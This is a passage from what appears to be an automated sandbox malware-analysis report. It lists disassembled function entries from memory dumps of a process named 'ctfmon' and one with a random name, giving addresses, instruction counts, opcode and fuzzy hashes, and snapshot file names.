                  • Opcode Fuzzy Hash: 33dbb50c46da1f5e7fe1ac4cd0732337811f0acbd30eeaf9fdb9e4af699a0a6e
                  • Instruction Fuzzy Hash: DC318D30D0D28A8EEB11EBA888097FE7BE0EF25794F044576D405F61C2EB79A548CB59
                  Function 00007FF848F42838 Relevance: .1, Instructions: 63COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f95f6d5043c2333625862b6cd6df1a636123af0d451615593a615b9636314404
                  • Instruction ID: b86fcfc1f3ebc6b87156eabc64340b31b36c04ad322ebed81dd7829bad709443
                  • Opcode Fuzzy Hash: f95f6d5043c2333625862b6cd6df1a636123af0d451615593a615b9636314404
                  • Instruction Fuzzy Hash: E9118B3085E78E8FEB59AB7484182FD3BA0FF65641F1009BBE819C21D2EF38A558C741
                  Function 00007FF848F40608 Relevance: .1, Instructions: 60COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 31de9213d919bb0f17f563fc8601430fc25b659309b16df8810e537602eb1105
                  • Instruction ID: 51b728e5ca61028d4c193e7e18ba77e79f0e79d46be1a3dcdd5561d7f9a67d8e
                  • Opcode Fuzzy Hash: 31de9213d919bb0f17f563fc8601430fc25b659309b16df8810e537602eb1105
                  • Instruction Fuzzy Hash: 2B118F3085D78E9FEB59AB7484082BE77A4FF15745F50047BE819C11D2EF38A558C741
                  Function 00007FF848F405D8 Relevance: .1, Instructions: 60COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f28c34ac1ae23e2db326b30b8dfdb5aaf2644774a3e34f257b20fe8ae69f8cac
                  • Instruction ID: e36656192ba359827f7345b536b41d9f3c40f6796591b3df02cbecb542c57854
                  • Opcode Fuzzy Hash: f28c34ac1ae23e2db326b30b8dfdb5aaf2644774a3e34f257b20fe8ae69f8cac
                  • Instruction Fuzzy Hash: F3119A30948A5D8FDB49EF2484596B97BB1EF29340F1044BFD40AD30D2DB36A485CB44
                  Function 00007FF848F40610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ee349c55ebfa7e12f891f72ab5163080f28ea696574a32081c1a9d8bfe17703b
                  • Instruction ID: 8dc82fa8f732052b2f8b51ee4f7b87ad4dd6d3e3c03cb08525fdb963e22413bf
                  • Opcode Fuzzy Hash: ee349c55ebfa7e12f891f72ab5163080f28ea696574a32081c1a9d8bfe17703b
                  • Instruction Fuzzy Hash: D0016930819A0E9EEB48EB6484586BDB7A0FF28745F20087FE81ED21D5DF35A594C714
                  Function 00007FF848F40F9A Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d13dfdffb480e30d56d8fced9f549a011392d685be3a18d436cb5490535b8ed0
                  • Instruction ID: 2c8ba1020fe24d2c1c701bff71d59c0588e0bd8c7dd20214f02e70b6214b2444
                  • Opcode Fuzzy Hash: d13dfdffb480e30d56d8fced9f549a011392d685be3a18d436cb5490535b8ed0
                  • Instruction Fuzzy Hash: 22F03030A094198FEB50EB48C980BEE77F1EB94345F108276C409A3285CF39AE848F88
                  Function 00007FF848F486C8 Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 48c82dc0f57b45cf7d3db02653334bf833c922603533d2ae3462411b959b7ccd
                  • Instruction ID: e702228839656056be885304733ca5aa6bbe095e1f0dae769a47349558ebbb74
                  • Opcode Fuzzy Hash: 48c82dc0f57b45cf7d3db02653334bf833c922603533d2ae3462411b959b7ccd
                  • Instruction Fuzzy Hash: 02E0C9B0E1C91E8EDBA4EB1489407B876B1BB64744F2040FAC20DF21E0DB342AC18F08
                  Function 00007FF848F47497 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 19e52234b08fe96b60c110f043f71cc798f7e3e331db9339d78190f26c2a6093
                  • Instruction ID: 15411c35a7e143d67f1fd754c0862e170bbf1e8846eea39e60ed2e12b7eba2f1
                  • Opcode Fuzzy Hash: 19e52234b08fe96b60c110f043f71cc798f7e3e331db9339d78190f26c2a6093
                  • Instruction Fuzzy Hash: 73E04CB0D1C91D8EDBA4EB04C840BA8B7B1FB64744F1041FA820DF3294DB346AC19F08

                  Executed Functions

                  Function 00007FF848F43645 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID: V_H
                  • API String ID: 0-105569101
                  • Opcode ID: ab6b2a8aaf134fb62a4879fdb884742c813e50c3a74b4f5216d7afed7e2bd1ef
                  • Instruction ID: 6da7df46253f1c08716fbb971d6c66b645da58218297f98d5d38a1f2c9476bcf
                  • Opcode Fuzzy Hash: ab6b2a8aaf134fb62a4879fdb884742c813e50c3a74b4f5216d7afed7e2bd1ef
                  • Instruction Fuzzy Hash: 7391CE71D1D94E8FEB48EB2CC868BADBBE1FF59754F5001BAC009D72C6CB6818458B45
                  Function 00007FF848F542E0 Relevance: .8, Instructions: 849COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 49beb26618734a21930a66631afc3310aff8d2fff44eaf890b236c18fc380356
                  • Instruction ID: 76fb9587cad31367d7288b344e10b283177032754df1bd3f2064410c78495478
                  • Opcode Fuzzy Hash: 49beb26618734a21930a66631afc3310aff8d2fff44eaf890b236c18fc380356
                  • Instruction Fuzzy Hash: 40629171C0E6DA9FE796AB3488692F9BFA0FF26340F0405FAD448C61D3DB286544C756
                  Function 00007FF848F53768 Relevance: .8, Instructions: 826COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 73d9b82b3e3f75b7118f9ad99529f726b3ff5fb0bde754f7c41dff6f70f41a3d
                  • Instruction ID: 6449d86483b67aa6d17557a7f1f824396130b7af1475facd89f42889df497177
                  • Opcode Fuzzy Hash: 73d9b82b3e3f75b7118f9ad99529f726b3ff5fb0bde754f7c41dff6f70f41a3d
                  • Instruction Fuzzy Hash: 3652CE70C0D69A9FEB86EB2888592B9BBE0FF29341F1405BAD409C71D3DB38A584C755
                  Function 00007FF848F54448 Relevance: .7, Instructions: 706COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 432627abe827f1b5213bf7230286f60e4f8ecb6642ec789cd8b15b07bace5e76
                  • Instruction ID: 1e4cf069b84b479012bf5ee22d1e309c6c8c406b8c7ce19abab7fc543b43f286
                  • Opcode Fuzzy Hash: 432627abe827f1b5213bf7230286f60e4f8ecb6642ec789cd8b15b07bace5e76
                  • Instruction Fuzzy Hash: 17428271C0E6DA9FE796EB2488692F9BFA0FF26341F0405FAD808C61D3DB286544C756
                  Function 00007FF848F54D6D Relevance: .6, Instructions: 582COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0797a5f00389c9a6ce365e33d7410154fae89810b51d2b1df967ef9bdb362648
                  • Instruction ID: 415e0145de6029a0c03a09d5f0696b25ccb03e16c6c6f98784c960554fe2ac1f
                  • Opcode Fuzzy Hash: 0797a5f00389c9a6ce365e33d7410154fae89810b51d2b1df967ef9bdb362648
                  • Instruction Fuzzy Hash: C6228D7090DA8A9FEB95EB2888596BEBBE0FF19340F0405BAD409C71D3EF38A544C755
                  Function 00007FF848F55E21 Relevance: .4, Instructions: 439COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 695966c9f24ef6e89163b7414e9383fa773218963f90d286b0b9cf7013b590ff
                  • Instruction ID: 1ccd1c18261e68af7ce1eb3e51ad3857929533e3393ea8d81a5edc0114ee097c
                  • Opcode Fuzzy Hash: 695966c9f24ef6e89163b7414e9383fa773218963f90d286b0b9cf7013b590ff
                  • Instruction Fuzzy Hash: B1E1AC3090D68A8FEB95EB2488596BABBF0FF19381F0445BAC419C71D3DF386984CB45
                  Function 00007FF848F52290 Relevance: .4, Instructions: 388COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 40bcd663af602432b8244efe184cb75b4fc639d437794f3c0e3f6bfe3401ca3b
                  • Instruction ID: 564137174ea7f2d7d834d514e300f99e051e5a5154de8ac45feb72d4538da9c9
                  • Opcode Fuzzy Hash: 40bcd663af602432b8244efe184cb75b4fc639d437794f3c0e3f6bfe3401ca3b
                  • Instruction Fuzzy Hash: E8D1A83080D68A8FEB45EF64C8696FABBE0FF19300F0546BAE409C71D2DB38A544CB54
                  Function 00007FF848F56D28 Relevance: .3, Instructions: 288COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0455418988f3db5d0e4d25261470e535138c419d47874e18e1c2296164cd7c0e
                  • Instruction ID: 5701d1cf1ef0bcbc3d34466bceab69fcb62ea3f83eab32e8db529053ea3378ce
                  • Opcode Fuzzy Hash: 0455418988f3db5d0e4d25261470e535138c419d47874e18e1c2296164cd7c0e
                  • Instruction Fuzzy Hash: 9EA1AE3080D68A8FEB9AEF2488692B9BBE0FF5A381F0404BED419C61D3DB396545C755
                  Function 00007FF848F4D9D1 Relevance: 2.9, Strings: 2, Instructions: 383COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID: NH$p\H
                  • API String ID: 0-1232786254
                  • Opcode ID: 4de8a41e768433cbaa2fd19b8a0ce340abde060bbf4a45a81949e644bb4e03a6
                  • Instruction ID: 85699d7fef789a9af731f76d5a24416de1f7060bc6fba61e077f0b7675be4752
                  • Opcode Fuzzy Hash: 4de8a41e768433cbaa2fd19b8a0ce340abde060bbf4a45a81949e644bb4e03a6
                  • Instruction Fuzzy Hash: DBD12931D19A599FEB98EB68D4957B8B7B1FF68741F0401BAD00DE32D2CB386884CB54
                  Function 00007FF848F4C8FB Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID: {K_^
                  • API String ID: 0-1346742216
                  • Opcode ID: da0fe5a7eec0db3ade6984b1f69b2c2914da77de98a5f12e58851d75d6aebedc
                  • Instruction ID: 0f4b5b4cc3bb4744835f4e600bcbcba750e02843cf663a64efc6dc6a86bdb578
                  • Opcode Fuzzy Hash: da0fe5a7eec0db3ade6984b1f69b2c2914da77de98a5f12e58851d75d6aebedc
                  • Instruction Fuzzy Hash: 6241043290D25AAEEB51BB6CB8501FA7B60EF217B8F041337D10CD90C3EF2C244582A9
                  Function 00007FF848F55367 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID: 8mH
                  • API String ID: 0-1362847371
                  • Opcode ID: 4dc80c0fd625d7d6f4098f86decdbfc2b3ac0be586035f3a7a493db1fb750cae
                  • Instruction ID: 6b4671fc240515cc8067968e23027825bbff3143d47c0d5a7ec499a8389a060b
                  • Opcode Fuzzy Hash: 4dc80c0fd625d7d6f4098f86decdbfc2b3ac0be586035f3a7a493db1fb750cae
                  • Instruction Fuzzy Hash: AF41DB70D1895D8FEF94EFA8D895AACB7F1FF68341F50016AD00DE7296DB3468858B40
                  Function 00007FF848F4122D Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: 0526cc6d14e122dc4849a0a1e032571a6591c3eb80acd6d9aa69bdc1d9acf038
                  • Instruction ID: 05ec453e471aa573d9da6339f8d67e33bfecf1cec9bfc33261637ed22aec4d90
                  • Opcode Fuzzy Hash: 0526cc6d14e122dc4849a0a1e032571a6591c3eb80acd6d9aa69bdc1d9acf038
                  • Instruction Fuzzy Hash: 1211E230D0DA5A8FEB59EB68C8592B97BE0FF6A751F0001BBC40AD61D2EB245580C720
                  Function 00007FF848F41240 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: a895fa753cde38c4c2d23f5b06a0a9f7872ad7f875d326ef0dc84bcc6a4723aa
                  • Instruction ID: 4a252e746d29a85c6f1b13c62e2613f5a9ab45c6c0c14b1d3e7bbcbd1593848c
                  • Opcode Fuzzy Hash: a895fa753cde38c4c2d23f5b06a0a9f7872ad7f875d326ef0dc84bcc6a4723aa
                  • Instruction Fuzzy Hash: 6EF0F430D0DA6F8EEB98AB6898093FA77E0FF66651F00017BD80DD20C1EF341290C250
                  Function 00007FF848F545F8 Relevance: .6, Instructions: 579COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d7fe8c7822f37e4b7da7c10d1c1f135623f25a69fa3d216b7add7ded46938a53
                  • Instruction ID: 4a0d204607dcc4a0899af0ae6adbe3c18ccb4d70601eda3038bc29faaf1745db
                  • Opcode Fuzzy Hash: d7fe8c7822f37e4b7da7c10d1c1f135623f25a69fa3d216b7add7ded46938a53
                  • Instruction Fuzzy Hash: 2F228171C0E6DA9FEB95EB2488592F9BFE0FF26351F0405BAD808C61D3EB286544C746
                  Function 00007FF848F54698 Relevance: .5, Instructions: 530COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bb843b39a31fd9fbd17d5b329f2fc4c19d6d39fe10a68830e761570da2bc1a9e
                  • Instruction ID: 69a4898f655a3a197cc2e4e3bbc8fe8086b2fd0e7070f2ff07c100a2ceceda1e
                  • Opcode Fuzzy Hash: bb843b39a31fd9fbd17d5b329f2fc4c19d6d39fe10a68830e761570da2bc1a9e
                  • Instruction Fuzzy Hash: E1129271C0E6DA9FE796EB2488592F9BFE0FF26341F0405BAD808C61D3EB286544C746
                  Function 00007FF848F53790 Relevance: .5, Instructions: 529COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: adfe96cd5f9b6f6c9c22926c6b622212c79fd3e7d1497942b0060334b533cb03
                  • Instruction ID: b1994ae40689fc39400f0f89f92bd3ee8bd6c8a6c7d9c371a45a2fa88a97eb98
                  • Opcode Fuzzy Hash: adfe96cd5f9b6f6c9c22926c6b622212c79fd3e7d1497942b0060334b533cb03
                  • Instruction Fuzzy Hash: D1129171C0E6DA9FE796EF2488592F9BBE0FF26341F0405BAD808C61D3EB286544C756
                  Function 00007FF848F57BDD Relevance: .5, Instructions: 485COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ef4042711016b245a96b87d80af79c99180369fe46d6fec895497427e0de419f
                  • Instruction ID: e5def1876480a41fb3e1c0e56cc1299c1852b75e26ccab2be108f8cd1b60b59d
                  • Opcode Fuzzy Hash: ef4042711016b245a96b87d80af79c99180369fe46d6fec895497427e0de419f
                  • Instruction Fuzzy Hash: 52718D3084DA898FEB46AB3488696F9BBA0EF1A341F1504BAD409CB0E3DB29A545C755
                  Function 00007FF848F5339D Relevance: .5, Instructions: 454COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6b88b220df5a45d4cc1b34e25dbb297d1c661d34aa6c4d18d8270b4af4d7568
                  • Instruction ID: f3357423981a238cd0d9985fc950a4b9fee49ac02a06e14745d14fdea77d6295
                  • Opcode Fuzzy Hash: a6b88b220df5a45d4cc1b34e25dbb297d1c661d34aa6c4d18d8270b4af4d7568
                  • Instruction Fuzzy Hash: 07115E71D0D68A9EE752E72C88595A9BFF0FF16344F4904F6D048C71E3EB28A9448712
                  Function 00007FF848F53AFB Relevance: .3, Instructions: 315COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 16a3b5e6e88f9a4b0a2dbe4a82525d20a0d12304f63ee7f9190e98492c7d4c51
                  • Instruction ID: 80241488104b028d476ff8b04ecc1bc32a480ace02b0edc412a780e2b5bdbb4a
                  • Opcode Fuzzy Hash: 16a3b5e6e88f9a4b0a2dbe4a82525d20a0d12304f63ee7f9190e98492c7d4c51
                  • Instruction Fuzzy Hash: 61C12670D0C6599EEB95EB6C98597A9BBF1FF19340F4041BAD00DE3292DB3869848B14
                  Function 00007FF848F57253 Relevance: .3, Instructions: 299COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 59af0daab142c16975952ed63997d142357354ce62c62fe6aafc98b4221edc8f
                  • Instruction ID: 70908b25e7771e04420904dda1b291fcbf3ca9e75b2b666893474d5c91eb8611
                  • Opcode Fuzzy Hash: 59af0daab142c16975952ed63997d142357354ce62c62fe6aafc98b4221edc8f
                  • Instruction Fuzzy Hash: 96A18D3080DA8A9FEB52FB7488595B9BBF0FF1A350F0545BAD408C7093EB38A554C759
                  Function 00007FF848F57511 Relevance: .3, Instructions: 274COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ece0fa4503eccc7d9078a5874b3878f3221132f3617babd5a2c8d233c9191122
                  • Instruction ID: d616662b709f2876587bded9924c7b3587f28ec996627157c314857f7b0245df
                  • Opcode Fuzzy Hash: ece0fa4503eccc7d9078a5874b3878f3221132f3617babd5a2c8d233c9191122
                  • Instruction Fuzzy Hash: 82A19E7090DA8A8FEB56EB28C8586F9BBF0FF19341F1504BAC409C71D2EB78A544C759
                  Function 00007FF848F41738 Relevance: .3, Instructions: 263COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d814185bbbb45d65b75feb780e861d313cba5c6d47a1a3420f3410af7daa9dbe
                  • Instruction ID: bad753402370c061fc130401bc2adeb751d0203c6d5b2820bb597bf7a8e5e793
                  • Opcode Fuzzy Hash: d814185bbbb45d65b75feb780e861d313cba5c6d47a1a3420f3410af7daa9dbe
                  • Instruction Fuzzy Hash: 7C719B31A0CA5A8FDB48EF1C98516A977E2FFA8B50F14017AD44ED32C2CF34A842C785
                  Function 00007FF848F50D11 Relevance: .2, Instructions: 250COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a56efe544253aef1ac0ef4672e03daf8a0bd1e8eddc29a10737880723bb9747b
                  • Instruction ID: 1114e10842864c73d4c48624e9c9303f4f268923702d80f5d5e6bccb5fb4ee00
                  • Opcode Fuzzy Hash: a56efe544253aef1ac0ef4672e03daf8a0bd1e8eddc29a10737880723bb9747b
                  • Instruction Fuzzy Hash: 3D91893090C68E8FEB95EF24C8592B9BBF1FF59300F1405BAD809C7192DB38A984CB44
                  Function 00007FF848F528B1 Relevance: .2, Instructions: 242COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e3275c459c01e8bafc1d5e9309fcaaeacfd30afce35be33b67e926f71e8336ed
                  • Instruction ID: bf55815aaa4aaadafc66af0425b8549297a9120d4974d93804010d4b74356bd1
                  • Opcode Fuzzy Hash: e3275c459c01e8bafc1d5e9309fcaaeacfd30afce35be33b67e926f71e8336ed
                  • Instruction Fuzzy Hash: B5910A30D0C55E8EEB90EBA888487EDBBB1FF59340F1041BAD00DE7292DB3469848B54
                  Function 00007FF848F52350 Relevance: .2, Instructions: 214COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4b4f1f901cbdb4b86d9832cd9bc9e476c5df18844565060e5e33aaa3810e4c18
                  • Instruction ID: 75bdd5005866d878a91606ab0508d598d766028ba9ab7e3a462e15134cf0f0ce
                  • Opcode Fuzzy Hash: 4b4f1f901cbdb4b86d9832cd9bc9e476c5df18844565060e5e33aaa3810e4c18
                  • Instruction Fuzzy Hash: 5D718C30D1D68A8FEB55EF64C8592FABBE0FF19340F04467AE809C21D2EB38A554CB45
                  Function 00007FF848F4C7FB Relevance: .2, Instructions: 209COMMON
                  Download Yara Rule
                  Memory Dump Source
